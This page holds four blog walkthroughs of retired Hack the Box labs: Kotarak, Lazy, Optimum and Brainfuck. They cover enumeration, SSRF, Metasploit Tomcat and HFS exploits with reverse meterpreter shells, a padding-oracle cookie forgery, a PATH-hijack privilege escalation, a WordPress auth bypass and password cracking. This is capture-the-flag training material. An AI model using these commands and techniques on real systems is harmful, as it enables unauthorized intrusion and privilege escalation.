Hack the Box Challenge Kotarak Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Kotarak” which is available online for those who want to increase their skill in penetration testing and black box testing. Kotarak is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Hard

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.55 so let’s begin with nmap port enumeration.

nmap -p- -A 10.10.10.55 –open  

From given below image, you can observe we found port 22, 8009, 8080, 60000 are open in victim’s network.

As port 8080 and 60000 are running HTTP, we open the IP in our browser and access the page through port 8080. As soon as we open the ip in our browser we get a tomcat authentication prompt asking for username and password.

When we access the target machine through port 60000, we find a page that is hosted on the machine can be used to access the internet.

Now we need to use the dirb tool to enumerate the directories of the target machine.

dirb http://10.10.10.55:60000/

From given below image you can observe the highlighted directory that is put up by dirb in its output result.

We now try to check if the page is vulnerable to SSRF or not by trying to access a forbidden page on the target machine.

when we open server-status through the vulnerable page, we are able to access the forbidden content. We then find that port 888 is listening locally on the target machine.

Then we opened http://localhost:888 through URL and it contains a few links to different files.

We open backup and find that it was empty.

To gain further information we used curl to access the page and find that it is an XML file that contains a username and password.

curl http://10.10.10.51:60000/url.php?path=localhost:888/?doc=backup

We use the above credentials to login into tomcat manager application that is hosted on port 8080.

As we were able the right credentials for tomcat server, we found that it was vulnerable to this exploit here. We used metasploit to exploit this vulnerability.

msf > use exploit/multi/http/tomcat_mgr_upload

msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.55

msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf exploit(multi/http/tomcat_mgr_upload) > set httpusername admin

msf exploit(multi/http/tomcat_mgr_upload) > set httppassword [email protected]!

msf exploit(multi/http/tomcat_mgr_upload) > exploit

Finally, we got the meterpreter session as shown in the below image

After gaining the reverse shell we start enumerating the target system. In /home/tomcat/to_archive/pentest_data we find a few interesting files.

In /home/tomcat/to_archive/Pentest_data we find a directory information tree file and binary file.

We download both the files into our system

We used impacket-secretsdump to dump hashes inside the files.

We were able to crack one of the hashes and find it to be f16tomcat!

We use this to login as atanas, we then move into /root/ folder and find a file called flag.txt. When we open it we find that it was a dummy flag file.

In the root directory, we also find a log file when we take a look at the content of the file we find that it contains log that we were created using wget. We also find that the wget version used is 1.16

Searching on the Exploit-DB site we find that this version of wget was vulnerable to remote code execution.

We follow the instructions given on exploit-db.com about how to exploit this vulnerability.

Then we had opened the wgetrc file through vim for changing the path of Post_file from /etc/shadow into /root/root.txt

We download the code of this exploit from exploit-db.com and upload it to the target machine through meterpreter.

We then give read, write and execute permission to the file.

We then use authbind to run the file, as authbind allows a program to that would normally require super user privileges to access privileged network services to run as a non-privileged user.  As soon as we run the exploit we get the root flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

Hack the Box Challenge Lazy Walkthrough

Hello Friends!! Today we are going to solve a CTF Challenge “Lazy”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs are designed for beginner to the Expert penetration tester. Lazy is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, therefore, they have a static IP. Lazy Lab has IP: 10.10.10.18.

Now, as always let’s begin our hacking with the port enumeration.

nmap -A 10.10.10.18

As you can see in the given screenshot that we have two services running on our Target Machine, ssh and HTTP on ports 22 and 80 respectively.

The Port 80 is open so let’s open IP in out Browser to see that if a website is hosted on the IP. After opening the IP in the browser, we were greeted by a simple page with Register and Login Links. Clicking on the Register opens up a form.

Then I decided to register as admin: 123 for username and password respectively. 

But I got an alert “Duplicate entry ‘admin’ for key PRIMARY”, also received error “can’t create user: user exists” when I registered as admin. Hence username “admin” is already registered, now we though to crack the password for login but that was quite tough to crack.

At last, I decide to use burp suite for capturing browser request. Here I simply register with aadmin as username and password 123.

And got intercepted request, here I saw auth cookie. Then I send the intercept request to the repeater for analyses its response. It gave a hint “invalid padding” which means there could be padding oracle vulnerability. To know more about what is padding oracle vulnerability read our previous article from here. Since I had already faced such situation in my past experience, therefore, I know what to do next.

Next open terminal to run the command shown in the given image which contains target URL and above-copied auth cookie

Further type 2 where it asked ID recommended

Last part of screenshot has captured three decrypt values in base64, HEX and ASCII. The cookie of auth is a combination of username with its password from padbuster we come to know what is the encrypted value of username for admin.

We are very near to our goal just encrypt this auth cookie with the user as admin once again. Here we have our plaintext as admin and let’s encode it using padbuster.

Further type 2 where it asked ID recommended. Here the highlighted part is our encrypted value for admin. Copy It “BAit——–AAAA”.

Now replace the original auth cookie from the encrypted value which you have copied above and forwarded the intercepted request.

When request sent by burp suite, automatically on the web server you will get logged in as an admin account. After that when you will access the admin page you will get a URL “my key” that offers us with a username mitsos and an ssh key. 

So as you can observe that we had opened the ssh key let’s save it into a text file as “key” on the desktop and if you notice the URL can read ssh login username mitsos.

First, let’s download the key and then give appropriate permission using the chmod. Now that we have the ssh username and key let’s get an ssh session.

ssh -I key [email protected]

After successfully accessing PTY shell of a victim system, a simple ‘ls’ command shown us that we have the user.txt. Congrats we got our user flag.

Now, let’s work on the root flag.

As we saw in the screenshot above that we the peda and backup folder too. We tried working around it but nothing useful seems to come up. On running the executable backup we saw that it prints the shadow file with user hashes. So we ran the strings command and found that it does contain command “cat /etc/shadow” 

Now, all we needed to do was to create a personalized executable cat file, which can be done as shown in below image. Here we are reprogramming cat to give us the shell, on execution.

Now I will have to set $PATH, firstly let’s see the $PATH using the echo command

echo $PATH

Now exporting Path

export PATH=’/home/mitsos’ :$PATH

Here what we did was add the home/mitsos in the $PATH because we have created that personalized cat file here. Now if we ran the backup executable, our cat will get executed.

But Lets First give the proper permission to the personalized cat file we created.

chmod 777 cat

Now let’s execute the backup to see if we get the shell. Great! We have the root shell.

Now all left is to get to the root directory and get the flag. But remember we have the $PATH changed so to run the cat command we will have to specify the location.

/bin/cat root.txt.

Great!! We got our root flag successfully

And this way, we successfully solved our challenge. YAY!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Box Challenge: Optimum Walkthrough

Hello friends!! Today we are going to solve another CTF challenge called “Optimum” which is categorised as retired lab developed by Hack the Box for the purpose of online penetration practices. Solving this lab is not that tough if have proper knowledge of Penetration testing. Let start and learn how to breach it.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online, therefore they have static IP. The IP of optimum is 10.10.10.8 so let’s start with nmap port enumeration.

nmap -A 10.10.10.8

From given below image, you can observe that we found ports 80 is open for file sharing using HFS 2.3 in victim’s network.

When I Googled relative exploit I found first link for Metasploit exploit.    

Then run msfconsole command in terminal and load metasploit framework to use the said exploit and for that type the following commands :

use exploit/windows/http/rejetto_hfs_exec

msf exploit(windows/http/rejetto_hfs_exec) >set payload windows/x64/meterpreter/reverse_tcp

msf exploit(windows/http/rejetto_hfs_exec) >set rhost 10.10.0.8

msf exploit(windows/http/rejetto_hfs_exec) >set lhost 10.10.14.6

msf exploit(windows/http/rejetto_hfs_exec) >set svrhost 10.10.14.6

msf exploit(windows/http/rejetto_hfs_exec) >exploit

And when it works perfectly, you will get a meterpreter session 1 as shown below and by running sysinfo command you will know about the victim’s system information.

Now let’s complete this task by searching user.txt and root.txt flag which is hidden somewhere inside its directories.

Inside c:\Document and Setting \kostas\Desktop I found the user.txt file and used the cat command to read this file.

cat user.txt.txt

Great!! We got our 1st flag successfully

To get root flag I really struggle a lot, all privilege escalation exploit suggested by recon/local_exploit_suggester did not work when I tried them.  Then I took help from Google and searched for exploit related to windows server and found many exploits, “MS16-098 exploit 41020” was among them.  I simply downloaded this exe file and applied manual privilege escalation.

After downloading exe file from Google, I transferred it to target’s machine via meterperter session; with help of following commands:

Meterpreter> upload /root/Desktop/41020.exe .

Meterpreter> shell

Then after executing whoami command, it assured me “nt authority\system”

Inside c:\Document and Setting \Administrator\Desktop I found the root.txt file and used the type command to read the file.

type root.txt

Great!! We got our 2nd flag successfully

And this way, we successfully solved our challenge. YAY!

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

 

Hack the Box Challenge: Brainfuck Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Brainfuck” which is retired vulnerable lab presented by Hack the Box for making online penetration testing practices according to your experience level. Although in this challenge you can test your expertise by WordPress penetration testing and how much knowledge you have in cryptography by decrypting any encryption that you will get in this lab.

Level: Hard

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.17 so let’s begin with nmap port enumeration.

nmap -A 10.10.10.17                  

From given below image, you can observe we found so many ports are open such as 22,25 and so on in victim’s network and moreover I got three domain names as highlighted in below image.

Now the next option was to add target IP inside /etc/host file since port 443 was open containing three domain names obtained from scanning result thus I edit sup3rs3cr3t.brainfuck.htb www.brainfuck.htb  brainfuck.htb as host name.

Then I  explored all three domain names one by one in web browser but when I explored https://brainfuck.htb found following webpage page which was indicating that it is a wordpress site and pointing toward SMTP mail Id [email protected] as highlighted in below image.

Now we decided to use wpscan –u http://brainfuck.htb/ –disable-tls-checks –enumerate p –enumerate t –enumerate u command on the URL that we have entered in the browser. To check if there are any kind of vulnerable themes, plugins, username and etc.

From wpscan result I grabbed the vulnerability in wordpress plug-in “support plus responsive ticket system” for Remote code execution as highlighted below.

Moreover it dumped two login user name “admin & administrator

With help of Google I search associated exploit for compromising victim’s credential and found exploit 41006 as shown below.

Inside this I saw html form code for remote code execution, now copy it and paste it into a text document.

Here please notice the changes I had made by adding “value: admin as username and [email protected] as email and target URL in action https://brainfuck” and saved it as wp.html on desktop.

Then I run Python script for file transfer via port 80.

python -m SimpleHTTPServer 80

Then explore wp.html file in localhost server as shown below and click on login tab.         

By doing so You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().Then you can go to admin panel by visiting https://brainfuck once again.

You will get admin panel of wordpress and start penetrating it for getting a clue.

Inside admin dashboard I looked at plugin for further step where I found SMTP plug-in.

It was terrific moment when I saw user authentication login are filled in text field. So I read username “orestis” but password was in bold character, which I need to convert in plain text using inspect element.

Wonderful!! Here is orestis plain text password value as shown below in highlighted text, let’s use them for smtp login.

 

Through telnet command: telnet 10.10.10.17 110 we established connection with SMTP server and login into orestis account, now for reading orestis inbox messages I ran retr 1 command but didn’t get any useful message and move to another message by running retr 2.

Here I found something very crucial that there is username and password for any “Secret” forum for login and after deep-thinking I realized this credential could be connected to sup3rs3cr3t.brainfuck.htb which I had explored in web browser.

Again I explore https:\\sup3rs3cr3t.brainfuck.htb then submit above found credential and got successful login.

It showing super-secret forum which is pointing towards any secret discussion chat inside “Key” and “SSH Access”

Inside “Key” I notice chatting between admin and orestis which was going beyond my sense. Might be orestis and admin are sharing some confidential information in this secret chat but in last reply of admin it looked like he is secretly sharing any encrypted URL.

Then I open “ssh access” Ahhhh!!! It was an English conversation where admin is giving suggestion to use Key for login instead of simple password. And by reading all conversation I concluded that orestis has lost SSH login key and asking admin to send the key in an encrypted chat that we saw above “Key” (secret discussion).

Time to decrypt their conversation for getting ssh login key but don’t know from where to start. After spending so much time and efforts at last I successfully decrypted and found ssh login key.

Now you’re Question: How it become possible?

And my answer is: observe the given below step carefully:

From both chat “Key” and “ssh access” I copied following text into a text file respectively and removed the space provided between the word as shown in below.

  • Pieagnm – Jkoijeg nbw zwx mle grwsnn (message in cipher text)
  • Orestis – Hacking for fun and profit (decrypt key in plain text)

Considering cipher text is encrypted information and plaintext as decrypting key.

With help of online decipher I had pasted above cipher text inside encipher textbox and decryption key inside decipher textbox and received decipher message “BrainfuCkmybrainfuckmybrainfu”

If you remember we had obtained encrypted URL from inside “Key” discussion, go for its decryption using above decipher message “fuckmybrain” as decrypting key. It took much time to identify proper encryption algorithm used for encrypting URL and we have successfully decrypt it with the help Vigerner cipher. It gave a plaintext URL for downloading id_rsa for ssh login as orestis.

From given below image you can observe that I have added encrypted URL in encrypted text field and used “fuckmybrain” as decrypting key and obtain Plain text URL.

After downloading id_rsa when I tried to open this file, then found that it required password to view its content.

Formerly I download a python script from here for cracking the password of this file. Then I ran following command and got desired output.

python sshng2john.py id_rsa > ssh_login                    

Then we used john the ripper for cracking this ssh_login file.

john ssh_login –wordlist=/usr/share/wordlists/rockyou.txt

3poulakia!” we got as result from executing above command.

And without wasting time I executed following command for login into SSH using 3poulakia! as password.

ssh -i id_rsa [email protected]                

Great!!  I logged in successfully, now let’s finish the task by grabbing user.txt and root.txt file. First I checked for available files in current directory which are inside it. Good to see user.txt in present location and then I open it using cat.

cat user.txt

Apart from user.txt I found three more files in this directory and when I open these file I got hint for Root Flag! Now follow below steps if you are also looking for root flag.

When I read content of encrypt.sage, it was pointing towards encrypted password within debug.txt and output.txt

When I open debug.txt and output.txt, here I saw encrypted information then again I chased towards Google for any help in such type of encryption and luckily found a decrypting script from this link: http://dann.com.br/alexctf2k17-crypto150-what_is_this_encryption/ and after that copied entire script into text file for decryption.

As describe in crypto150 algorithm I placed 1st, 2nd & 3rd line of debug.txt equal to p, q, e respectively. Ct is equal to content of output.txt as shown below and saved it as decrypt.py

Then run our decrypt.py through python and capture the root flag!!

python decrypt.py

Huhhhhh!!!!!! Such a hectic Lab it was but we have completed the challenge successfully. 

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...